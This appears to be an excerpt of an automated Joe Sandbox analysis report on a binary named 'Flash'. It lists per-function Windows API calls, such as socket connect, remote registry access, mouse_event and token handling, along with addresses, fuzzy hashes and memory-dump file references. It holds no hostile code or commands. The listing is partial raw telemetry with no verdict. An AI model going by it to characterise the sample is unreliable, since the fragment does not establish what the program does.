                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: b4c1b9917a7d724f1ce987eae5e6ddd128a2b5d24df69660fd033de2f281c582
                                                        • Instruction ID: c3e50512196a6c32cce38a959060d192dafb64ce7134087122569e6b737013bf
                                                        • Opcode Fuzzy Hash: b4c1b9917a7d724f1ce987eae5e6ddd128a2b5d24df69660fd033de2f281c582
                                                        • Instruction Fuzzy Hash: C4310CB1901109BFDB15DBD4DC89EFFB7BCFF08301F040569E912A2150EAB49E899AA0
                                                        APIs
                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00A56911
                                                        • GetWindowLongW.USER32(00F653B8,000000F0), ref: 00A56944
                                                        • GetWindowLongW.USER32(00F653B8,000000F0), ref: 00A56979
                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00A569AB
                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00A569D5
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A569E6
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A56A00
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: 3b6ca201116f72a971f81ac915fc217bdf40df7414c4f0a6683bf35f370bdacb
                                                        • Instruction ID: 63cfe0747dbd60fb4367735c351213b4900e0e583a116845da1dab6cb3d036ef
                                                        • Opcode Fuzzy Hash: 3b6ca201116f72a971f81ac915fc217bdf40df7414c4f0a6683bf35f370bdacb
                                                        • Instruction Fuzzy Hash: 74313534604150EFDB21CF98DC88F6937E1FB59352F5841A5FA058B2B2CBB1AC89CB50
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A2E2CA
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A2E2F0
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00A2E2F3
                                                        • SysAllocString.OLEAUT32(?), ref: 00A2E311
                                                        • SysFreeString.OLEAUT32(?), ref: 00A2E31A
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00A2E33F
                                                        • SysAllocString.OLEAUT32(?), ref: 00A2E34D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 24c166c43f8a76acbdaac8275a94b1ef8ede657df16de71014f46346865ea3b9
                                                        • Instruction ID: 9bb1514fbc551c62800adbc16a4d61ff257b2bc63683b8164607ec53c4f9c340
                                                        • Opcode Fuzzy Hash: 24c166c43f8a76acbdaac8275a94b1ef8ede657df16de71014f46346865ea3b9
                                                        • Instruction Fuzzy Hash: 12216576604219BF9F10DFACDC88DBB77BCEB09360B448125FA15DB250DAB0ADC58760
                                                        APIs
                                                          • Part of subcall function 00A48475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A484A0
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A468B1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A468C0
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A468F9
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00A46902
                                                        • WSAGetLastError.WSOCK32 ref: 00A4690C
                                                        • closesocket.WSOCK32(00000000), ref: 00A46935
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A4694E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: 1b8e5518329c9883c2f0a0ba89006bb2395b0fef2ef5c5e46bb69dc77f0e72f2
                                                        • Instruction ID: 28d9f1cdeb767115044b710522bae8d4c04b5aeaca767b05ba7b7d6d2528d053
                                                        • Opcode Fuzzy Hash: 1b8e5518329c9883c2f0a0ba89006bb2395b0fef2ef5c5e46bb69dc77f0e72f2
                                                        • Instruction Fuzzy Hash: E031C475600218AFDB10DF64DC85FBE77B9EB85721F048029FD05AB291CBB4AC458BA2
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A2E3A5
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A2E3CB
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00A2E3CE
                                                        • SysAllocString.OLEAUT32 ref: 00A2E3EF
                                                        • SysFreeString.OLEAUT32 ref: 00A2E3F8
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00A2E412
                                                        • SysAllocString.OLEAUT32(?), ref: 00A2E420
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: baf77d36a9208a66a95572cd145164f5439778988bfae680941239c032d7d4b2
                                                        • Instruction ID: fc83c7a76de358931c508573b4a3b1439d911301d0418f8f07ede1c6ed355bc6
                                                        • Opcode Fuzzy Hash: baf77d36a9208a66a95572cd145164f5439778988bfae680941239c032d7d4b2
                                                        • Instruction Fuzzy Hash: 24214735604114AF9B10EFACEC88DAF77ECEB493607048535FA15CB261DAB1ECC18764
                                                        APIs
                                                          • Part of subcall function 009D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 009D214F
                                                          • Part of subcall function 009D2111: GetStockObject.GDI32(00000011), ref: 009D2163
                                                          • Part of subcall function 009D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 009D216D
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A57C57
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A57C64
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A57C6F
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A57C7E
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A57C8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: d183e43bfcbf05212857762a8964d2323e2cb2620faec602fdcad8ce1b1e6dff
                                                        • Instruction ID: 2fbfc6ab4827732463b1e6a84c9a8cc028cb6176ed82c86c5c91570ebc400ac2
                                                        • Opcode Fuzzy Hash: d183e43bfcbf05212857762a8964d2323e2cb2620faec602fdcad8ce1b1e6dff
                                                        • Instruction Fuzzy Hash: A011B6B1150219BEEF159F60CC85EEB7F6DFF08758F014115FA04A2050C771AC21DBA4
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,009F4282,?), ref: 009F41D3
                                                        • GetProcAddress.KERNEL32(00000000), ref: 009F41DA
                                                        • EncodePointer.KERNEL32(00000000), ref: 009F41E6
                                                        • DecodePointer.KERNEL32(00000001,009F4282,?), ref: 009F4203
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoInitialize$combase.dll
                                                        • API String ID: 3489934621-340411864
                                                        • Opcode ID: 9ebc56fcdbf4df09c0569608c0f53b1e2bef4f6068a8787f7330f5cb7e5598c6
                                                        • Instruction ID: 7b520028467e12a7ed53a02435803470922460f57243171de7d23cc43184626e
                                                        • Opcode Fuzzy Hash: 9ebc56fcdbf4df09c0569608c0f53b1e2bef4f6068a8787f7330f5cb7e5598c6
                                                        • Instruction Fuzzy Hash: 47E0E5B0B90701AFEA11ABF0ED4EB5A3AB8BB11B06F604A25F501D91A0CBF550878F00
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009F41A8), ref: 009F42A8
                                                        • GetProcAddress.KERNEL32(00000000), ref: 009F42AF
                                                        • EncodePointer.KERNEL32(00000000), ref: 009F42BA
                                                        • DecodePointer.KERNEL32(009F41A8), ref: 009F42D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: 8a920b1741a4f33215e0d90f5858a290add0acfa90c2980d0945d007bee5a439
                                                        • Instruction ID: 54d4132786287ab557d84285f40e9ef1986ece9a7726d658df78173196bc2833
                                                        • Opcode Fuzzy Hash: 8a920b1741a4f33215e0d90f5858a290add0acfa90c2980d0945d007bee5a439
                                                        • Instruction Fuzzy Hash: 5BE0BFB0A50700EBDB12EBF1AD0EF563A78B700742F600615F101D51B0CFF4454ACB14
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 009D21B8
                                                        • GetWindowRect.USER32(?,?), ref: 009D21F9
                                                        • ScreenToClient.USER32(?,?), ref: 009D2221
                                                        • GetClientRect.USER32(?,?), ref: 009D2350
                                                        • GetWindowRect.USER32(?,?), ref: 009D2369
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Rect$Client$Window$Screen
                                                        • String ID:
                                                        • API String ID: 1296646539-0
                                                        • Opcode ID: 073b95d3ca216446e9a032fa22d91ac14bd51bbb35d042be9a8f6ede288d7921
                                                        • Instruction ID: d9ca6740d15d94e3c5e46fff2bfc7cc2047ac864b59a9353adbde756f86e9d93
                                                        • Opcode Fuzzy Hash: 073b95d3ca216446e9a032fa22d91ac14bd51bbb35d042be9a8f6ede288d7921
                                                        • Instruction Fuzzy Hash: 0EB1493990024ADBDB14CFA8C5807EEB7B1FF18710F14852AED69AB354DB74AA50CB64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                        • Instruction ID: a6cbd2b4d898c8832b26fcc0d44e6daccec803ef3e49276cb481a17fdec7cd81
                                                        • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                        • Instruction Fuzzy Hash: 7461E23150029AABCF11EF64CC86FFE77A9EF85308F048559F9559B2A2DB30AD05CB90
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A5040D,?,?), ref: 00A51491
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A5091D
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A5095D
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A50980
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A509A9
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A509EC
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A509F9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: f83cecee2274768305850004b5c618686d11ea7a34799d69c7c1896f2c16bdd2
                                                        • Instruction ID: 57af63e158cb94e5539ed5a0db6faf1643fb64f5019d4ac4159f180f960d8abc
                                                        • Opcode Fuzzy Hash: f83cecee2274768305850004b5c618686d11ea7a34799d69c7c1896f2c16bdd2
                                                        • Instruction Fuzzy Hash: DD515671208244EFD711EF64C885E6FBBB9FF84310F044919F995872A2DB31E949CB92
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A2F6A2
                                                        • VariantClear.OLEAUT32(00000013), ref: 00A2F714
                                                        • VariantClear.OLEAUT32(00000000), ref: 00A2F76F
                                                        • _memmove.LIBCMT ref: 00A2F799
                                                        • VariantClear.OLEAUT32(?), ref: 00A2F7E6
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A2F814
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: bba786f315c4411174e61d4a93cbab63d1e9989af3a5daaa20f6a52ea4bb7db5
                                                        • Instruction ID: 496e8c7543d14f97a7ec3239956537aa1c6c63c49ce5bd0f968693165356a250
                                                        • Opcode Fuzzy Hash: bba786f315c4411174e61d4a93cbab63d1e9989af3a5daaa20f6a52ea4bb7db5
                                                        • Instruction Fuzzy Hash: F45148B5A00219EFDB14CF58D884AAAB7B8FF4C314B15856AED59DB304D730E951CFA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A329FF
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A32A4A
                                                        • IsMenu.USER32(00000000), ref: 00A32A6A
                                                        • CreatePopupMenu.USER32 ref: 00A32A9E
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00A32AFC
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A32B2D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: cb71adbf924936c997adf9484f58e5d519526ecf167e6f5a838acb4f6bbf6a81
                                                        • Instruction ID: fc908b1fa60e61eed1e018c4ff7996defdc1c5ac002befba09212b9178c9e823
                                                        • Opcode Fuzzy Hash: cb71adbf924936c997adf9484f58e5d519526ecf167e6f5a838acb4f6bbf6a81
                                                        • Instruction Fuzzy Hash: 3C51BB70A0030AEBDF25CFA8D889BAEFBF4AF54314F10415AF8119B2A1E7B09945CB51
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 009D1B76
                                                        • GetWindowRect.USER32(?,?), ref: 009D1BDA
                                                        • ScreenToClient.USER32(?,?), ref: 009D1BF7
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009D1C08
                                                        • EndPaint.USER32(?,?), ref: 009D1C52
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: 1306d5eaa04f7c763732e403f349b73d5368314b059e6855411ee27a1ca51324
                                                        • Instruction ID: 840071c9601fcf59694bf6f59677bf0fab886611b538d0271ca47193362d0559
                                                        • Opcode Fuzzy Hash: 1306d5eaa04f7c763732e403f349b73d5368314b059e6855411ee27a1ca51324
                                                        • Instruction Fuzzy Hash: 8F41FF31258300AFD710DF64DC88FAA7BF8EB46360F10866AF995872B1C7709886DB61
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00A4550C,?,?,00000000,00000001), ref: 00A47796
                                                          • Part of subcall function 00A4406C: GetWindowRect.USER32(?,?), ref: 00A4407F
                                                        • GetDesktopWindow.USER32 ref: 00A477C0
                                                        • GetWindowRect.USER32(00000000), ref: 00A477C7
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A477F9
                                                          • Part of subcall function 00A357FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A35877
                                                        • GetCursorPos.USER32(?), ref: 00A47825
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A47883
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: a0c93489ae3476914bd3a5faaa3b1684a90f7f2d74906cf6268a3ecec339252c
                                                        • Instruction ID: bbfb95bce7d20154a579da63cbb49359f8d5dc16b9edda4fb5a76feb6b599424
                                                        • Opcode Fuzzy Hash: a0c93489ae3476914bd3a5faaa3b1684a90f7f2d74906cf6268a3ecec339252c
                                                        • Instruction Fuzzy Hash: A831B072508345ABD720DF64D849F9FB7A9FFC8314F00091AF589A7191CBB0E949CBA2
                                                        APIs
                                                          • Part of subcall function 00A28CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A28CDE
                                                          • Part of subcall function 00A28CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A28CE8
                                                          • Part of subcall function 00A28CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A28CF7
                                                          • Part of subcall function 00A28CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A28CFE
                                                          • Part of subcall function 00A28CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A28D14
                                                        • GetLengthSid.ADVAPI32(?,00000000,00A2904D), ref: 00A29482
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A2948E
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A29495
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A294AE
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00A2904D), ref: 00A294C2
                                                        • HeapFree.KERNEL32(00000000), ref: 00A294C9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
